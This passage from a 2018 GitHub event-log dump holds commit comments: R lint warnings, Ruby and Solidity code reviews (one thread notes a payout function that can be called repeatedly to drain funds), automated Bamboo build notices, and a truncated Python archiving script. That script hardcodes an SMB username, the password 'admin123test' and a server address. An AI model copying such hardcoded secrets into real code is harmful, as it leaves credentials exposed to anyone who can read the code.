is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_aantal.R:116:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_aantal.R#L116) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>setMethod(           #bij deze methode nog rekening houden met eventuele dubbels in de soortenlijst!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/selecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-16T10:11:40Z"}
{"id":"7969758389","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718215,"position":32,"line":32,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:11:51Z","updated_at":"2018-07-16T10:11:51Z","author_association":"COLLABORATOR","body":"1. do you need `:integer` twice?\r\n2. if you use `:date` I believe it will convert it to the Date object (but you will need to add another custom converter to strip the whitespaces): \r\n```\r\nstripper = lambda { |f, _| f.nil? ? f : f.strip }`\r\nconverters: [stripper, :integer, :date]\r\n```"}},"created_at":"2018-07-16T10:11:51Z"}
{"id":"7969760535","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29718220,"position":177,"line":94,"path":"contracts/Remittance.sol","commit_id":"5fb3a807fb7ea8b6f82dc71287ac7c7a884a5447","created_at":"2018-07-16T10:12:19Z","updated_at":"2018-07-16T10:12:19Z","author_association":"NONE","body":"Why don't you use the puzzle as the payment id?"}},"created_at":"2018-07-16T10:12:19Z"}
{"id":"7969760559","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718221,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-16T10:12:19Z","updated_at":"2018-07-16T10:12:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:12:19Z"}
{"id":"7969762228","type":"CommitCommentEvent","actor":{"login":"Nicofisi"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29718222,"position":null,"line":null,"path":null,"commit_id":"802f44b6d03c5756551611f612cb5ec165c91693","created_at":"2018-07-16T10:12:40Z","updated_at":"2018-07-16T10:12:40Z","author_association":"CONTRIBUTOR","body":"I wanted it 3 years ago back when I was scripting.. and that was really the only needed change.. lol"}},"created_at":"2018-07-16T10:12:40Z"}
{"id":"7969762809","type":"CommitCommentEvent","actor":{"login":"devapromix"},"repo":{"name":"gwathlobal/CotD"},"payload":{"comment":{"id":29718224,"position":null,"line":null,"path":null,"commit_id":"e737b0395facd2bbd3421ee1903bb89be5d04a51","created_at":"2018-07-16T10:12:48Z","updated_at":"2018-07-16T10:12:48Z","author_association":"NONE","body":"Good idea."}},"created_at":"2018-07-16T10:12:48Z"}
{"id":"7969762928","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718225,"position":33,"line":33,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:12:49Z","updated_at":"2018-07-16T10:12:49Z","author_association":"COLLABORATOR","body":"if you use this `:symbol` converter, you can have nicer access to the row columns: \r\n`row[:monthly_price]`, `row[:start_day]` etc."}},"created_at":"2018-07-16T10:12:49Z"}
{"id":"7969763045","type":"CommitCommentEvent","actor":{"login":"dchest"},"repo":{"name":"PeerioTechnologies/peerio-icebear"},"payload":{"comment":{"id":29718226,"position":15,"line":43,"path":"src/helpers/telemetry.js","commit_id":"6ea2c3287a2832a2518de0291819f0806b763649","created_at":"2018-07-16T10:12:51Z","updated_at":"2018-07-16T10:12:51Z","author_association":"MEMBER","body":"You can use `bytesToB64` and `strToBytes` from [crypto conversion utils](https://github.com/PeerioTechnologies/peerio-icebear/blob/dev/src/crypto/util.conversion.js) on mobile, something like `bytesToB64(strToBytes(JSON.stringify(object)))`.\r\n"}},"created_at":"2018-07-16T10:12:51Z"}
{"id":"7969765021","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29718228,"position":94,"line":49,"path":"contracts/Remittance.sol","commit_id":"5fb3a807fb7ea8b6f82dc71287ac7c7a884a5447","created_at":"2018-07-16T10:13:17Z","updated_at":"2018-07-16T10:13:17Z","author_association":"NONE","body":"Couldn't you use something like `.owner != 0` as a cheaper way of achieving the same?"}},"created_at":"2018-07-16T10:13:17Z"}
{"id":"7969765976","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718235,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-16T10:13:29Z","updated_at":"2018-07-16T10:13:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:13:29Z"}
{"id":"7969768151","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718241,"position":37,"line":37,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:13:58Z","updated_at":"2018-07-16T10:13:58Z","author_association":"COLLABORATOR","body":"I would rename `validate_row` to `valid_row?` - it's a convention in Ruby for boolean methods"}},"created_at":"2018-07-16T10:13:58Z"}
{"id":"7969769295","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29718246,"position":140,"line":73,"path":"contracts/Remittance.sol","commit_id":"5fb3a807fb7ea8b6f82dc71287ac7c7a884a5447","created_at":"2018-07-16T10:14:12Z","updated_at":"2018-07-16T10:14:12Z","author_association":"NONE","body":"Move this line up by 1 and do `require(etherAvailable > 0)`, that will save you gas because you read it twice from storage now."}},"created_at":"2018-07-16T10:14:12Z"}
{"id":"7969770425","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29718248,"position":116,"line":73,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T10:14:28Z","updated_at":"2018-07-16T10:14:28Z","author_association":"OWNER","body":"God, you're right. I need to ` payments[paymentID].processed = true;` or else the customer can call the function as many times as they want and drain the funds."}},"created_at":"2018-07-16T10:14:28Z"}
{"id":"7969770778","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718250,"position":26,"line":26,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:14:32Z","updated_at":"2018-07-16T10:14:32Z","author_association":"COLLABORATOR","body":"Can omit the `()` - not needed in method declarations or method calls"}},"created_at":"2018-07-16T10:14:32Z"}
{"id":"7969771384","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718251,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-16T10:14:41Z","updated_at":"2018-07-16T10:14:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:14:41Z"}
{"id":"7969776416","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29718258,"position":95,"line":50,"path":"contracts/Remittance.sol","commit_id":"5fb3a807fb7ea8b6f82dc71287ac7c7a884a5447","created_at":"2018-07-16T10:15:48Z","updated_at":"2018-07-16T10:15:48Z","author_association":"NONE","body":"This permits reuse of the `receiverOTP`."}},"created_at":"2018-07-16T10:15:48Z"}
{"id":"7969778371","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718266,"position":57,"line":57,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:16:14Z","updated_at":"2018-07-16T10:16:14Z","author_association":"COLLABORATOR","body":"Ruby likes `end_day` better than `endDay`... just a convention thing"}},"created_at":"2018-07-16T10:16:14Z"}
{"id":"7969778610","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718268,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-16T10:16:17Z","updated_at":"2018-07-16T10:16:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:16:17Z"}
{"id":"7969782553","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718270,"position":60,"line":60,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:17:10Z","updated_at":"2018-07-16T10:17:10Z","author_association":"COLLABORATOR","body":"if you have future reservations in the list this won't work"}},"created_at":"2018-07-16T10:17:10Z"}
{"id":"7969783274","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29718271,"position":120,"line":77,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T10:17:19Z","updated_at":"2018-07-16T10:17:19Z","author_association":"OWNER","body":"I think I have found the hole. The owner can call the function as many times as they want. I need to rethink how to implement this to meet the rest of the suggestions."}},"created_at":"2018-07-16T10:17:19Z"}
{"id":"7969788246","type":"CommitCommentEvent","actor":{"login":"BlueT"},"repo":{"name":"dgraph-io/tutorial"},"payload":{"comment":{"id":29718279,"position":null,"line":null,"path":null,"commit_id":"e6cc9eb6ffce42eca5c4c8c7ffe972321cf73f46","created_at":"2018-07-16T10:18:29Z","updated_at":"2018-07-16T10:18:29Z","author_association":"NONE","body":"I come for fixing this issue and see this been fixed by this commit.  :-)\r\nWonder why https://tour.dgraph.io/moredata/1/ haven't update yet?"}},"created_at":"2018-07-16T10:18:29Z"}
{"id":"7969789198","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29718280,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T10:18:43Z","updated_at":"2018-07-16T10:18:43Z","author_association":"NONE","body":"I'm not 100% sure on that: didn't we decide to get rid of the direct morph because it was slower or so and only use pre-compute morphing anyway? So I implemented it such that initializing the SourceMorph causes pre-computation (always, except when src is None (in my case)) and calling an instance applies it. Which would technically mean that - yes - SourceMorph always makes use of the precomputed way (of morphing surface data)"}},"created_at":"2018-07-16T10:18:43Z"}
{"id":"7969790233","type":"CommitCommentEvent","actor":{"login":"AdotDal"},"repo":{"name":"AdotDal/Gallant"},"payload":{"comment":{"id":29718281,"position":null,"line":null,"path":null,"commit_id":"47aef5b3ac729eb75247824ae623aa7be905314f","created_at":"2018-07-16T10:18:57Z","updated_at":"2018-07-16T10:18:57Z","author_association":"OWNER","body":"import os\r\nimport sys\r\nimport time\r\nimport shutil\r\nimport tarfile\r\nfrom os.path import isfile, isdir, join\r\nfrom datetime import datetime\r\n\r\nimport logging\r\nimport re\r\nfrom _io import open\r\nfrom subprocess import call\r\nimport popen2\r\n\r\n\r\n# Global variable for logging\r\nglobal cnt\r\nglobal total_size\r\nglobal log_file_list\r\nis_new = True\r\n\r\n# Globale variable for samba server interaction\r\nglobal smbConnFile\r\nglobal USERNAME\r\nglobal PASSWORD\r\nglobal SERVER_IP\r\nglobal SERVER_NAME\r\nglobal PORT\r\nglobal SHARE\r\n\r\ndef smbInit():\r\n    global smbConnFile\r\n    global USERNAME\r\n    global PASSWORD\r\n    global SERVER_IP\r\n    global SERVER_NAME\r\n    global PORT\r\n    global SHARE    \r\n    smbConnFile='SMBConnection.ini'\r\n    USERNAME='Phai'\r\n    PASSWORD='admin123test'\r\n    SERVER_IP='192.168.14.1'\r\n    SERVER_NAME='SERVER'\r\n    PORT='139'\r\n    SHARE='share'\r\nsmbInit()    \r\n#\r\n# Implementation\r\n#\r\ndef check_date(file_name, flag):\r\n    \"\"\" Function to check that a file is old \"\"\"\r\n\r\n    # Get current date\r\n    nw=datetime.now()\r\n    now_date = nw.date()\r\n    \r\n    n_year = now_date.year\r\n    n_month = now_date.month\r\n    n_day = now_date.day\r\n\r\n    # Get Staging directory name\r\n    if flag == 1:\r\n        # Get timestamp from file name\r\n        modified_timestamp = os.path.getmtime(file_name)\r\n        f_year = datetime.utcfromtimestamp(modified_timestamp).year\r\n        f_month = datetime.utcfromtimestamp(modified_timestamp).month\r\n        f_date =  datetime.utcfromtimestamp(modified_timestamp).day\r\n        \r\n        #mtime=datetime.utcfromtimestamp(modified_timestamp)        \r\n        \r\n        #print now_date-mtime\r\n        if (f_year > n_year) or ((f_month >= n_month) and (f_year == n_year)):\r\n            return False\r\n\r\n        if f_month < 12:\r\n            if f_month < 9:\r\n                f_month = '0' + str(f_month + 1)\r\n            else:\r\n                f_month = str(f_month + 1)\r\n\r\n            staging_subdir = '%s%d%s%s' % ('data_prior_to_', f_year, f_month, '01')\r\n        else:\r\n            staging_subdir = '%s%d%s' % ('data_prior_to_', f_year + 1, '0101')\r\n\r\n        return staging_subdir\r\n\r\n    if flag == 2:\r\n        # Get timestamp from file name\r\n        datetime_str_arr = str(file_name).split(\"_\")\r\n        datetime_str = str(datetime_str_arr.pop().split(\".\")[0])\r\n         \r\n        \r\n        \r\n        dt1=datetime.strptime(datetime_str, '%Y%m%d')\r\n        diff=(nw.year - dt1.year) * 12 + nw.month - dt1.month\r\n               \r\n        \r\n\r\n        if diff >6:\r\n            return True;        \r\n        else:\r\n            return False;\r\n\r\n\r\ndef validate_file(file_name):\r\n    \"\"\" Function to validate file format \"\"\"\r\n\r\n    dir_array = str(file_name).split(\"_\")\r\n\r\n    # Check about directories of Staging directory\r\n    if dir_array.__len__() == 4:\r\n        if dir_array[3].isdigit():\r\n            if len(dir_array[3]) == 8:\r\n                return True\r\n    return False \r\n\r\ndef move_staging(path, staging_path):\r\n    \"\"\" Function to move old files to Staging directory \"\"\"\r\n\r\n    print (\"\\nMoving old files from \" + str(path) + \" directory to Staging directory...\")\r\n\r\n    global cnt\r\n    global total_size\r\n    global log_file_list \r\n\r\n    f1 = 0\r\n    f2 = 0\r\n    f3 = 0\r\n    f4 = 0   \r\n    f5 = 0\r\n    f6 = 0\r\n    f7 = 0\r\n    f8 = 0\r\n\r\n    print (\"===== \" + str(path) + \" ======\")\r\n    sub_dir1 = os.listdir(path)\r\n\r\n    for sub1 in sub_dir1:\r\n        if os.path.isdir(join(path,sub1)):\r\n            f1 += 1\r\n    if f1 == 0:\r\n        for sub1 in sub_dir1:\r\n            if os.path.isfile(join(path,sub1)):\r\n                \r\n                staging_datadir = check_date(join(path, sub1), 1)   \r\n                if staging_datadir == False:\r\n                    staging_datadir = \"\"\r\n                else:\r\n                    try:\r\n                        os.stat(join(staging_path, staging_datadir))\r\n                    except:\r\n                        os.mkdir(join(staging_path, staging_datadir))\r\n                    try:\r\n                        os.stat(join(staging_path, staging_datadir, path))\r\n                    except:\r\n                        os.mkdir(join(staging_path, staging_datadir, path))                 \r\n    \r\n                    cnt += 1\r\n                    total_size += os.path.getsize(join(path, sub1))\r\n                    log_file_list.append(join(path, sub1))                               \r\n                shutil.move(join(path, sub1), join(staging_path, staging_datadir, path,sub1))           \r\n    else:\r\n        for sub1 in sub_dir1:\r\n            if os.path.isdir(join(path, sub1)):     \r\n                sub_dir2 = os.listdir(join(path, sub1))\r\n                for sub2 in sub_dir2:\r\n                    if os.path.isdir(join(path, sub1, sub2)):                \r\n                        f2 += 1\r\n        if f2 == 0:\r\n            for sub1 in sub_dir1:\r\n                if os.path.isdir(join(path, sub1)):    \r\n                    sub_dir2 = os.listdir(join(path, sub1))\r\n                    for sub2 in sub_dir2:\r\n                        if os.path.isfile(join(path, sub1, sub2)):\r\n                            staging_datadir = check_date(join(path, sub1, sub2), 1)   \r\n                            if staging_datadir == False:\r\n                                staging_datadir = \"\"\r\n                            else:\r\n                                str1=''\r\n                                for ptx in [staging_datadir,sub1]:\r\n                                    str2=join(str1,ptx)\r\n                                    try:\r\n                                        os.stat(join(staging_path, str2))\r\n                                    except:\r\n                                        os.mkdir(join(staging_path, str2))\r\n                                    str1=str2\r\n                                str1=''\r\n                                for ptx in [staging_datadir,path,sub1]:\r\n                                    str2=join(str1,ptx)\r\n                                    try:\r\n                                        os.stat(join(staging_path, str2))\r\n                                    except:\r\n                                        os.mkdir(join(staging_path, str2))\r\n                                    str1=str2       \r\n                                   \r\n                                                                 \r\n                                cnt += 1\r\n                                total_size += os.path.getsize(join(path, sub1, sub2))\r\n                                log_file_list.append(join(path, sub1, sub2))                             \r\n                            shutil.move(join(path, sub1,sub2), join(staging_path, staging_datadir, path, sub1,sub2))                        \r\n        else:\r\n            for sub1 in sub_dir1:\r\n                if os.path.isdir(join(path, sub1)):     \r\n                    sub_dir2 = os.listdir(join(path, sub1))\r\n                    for sub2 in sub_dir2:\r\n                        if os.path.isdir(join(path, sub1, sub2)): \r\n                            sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                            for sub3 in sub_dir3:\r\n                                if os.path.isdir(join(path, sub1, sub2, sub3)):                                              \r\n                                    f3 += 1           \r\n\r\n            if f3 == 0:\r\n                for sub2 in sub_dir2:\r\n                    if os.path.isdir(join(path, sub1, sub2)):            \r\n                        sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                        for 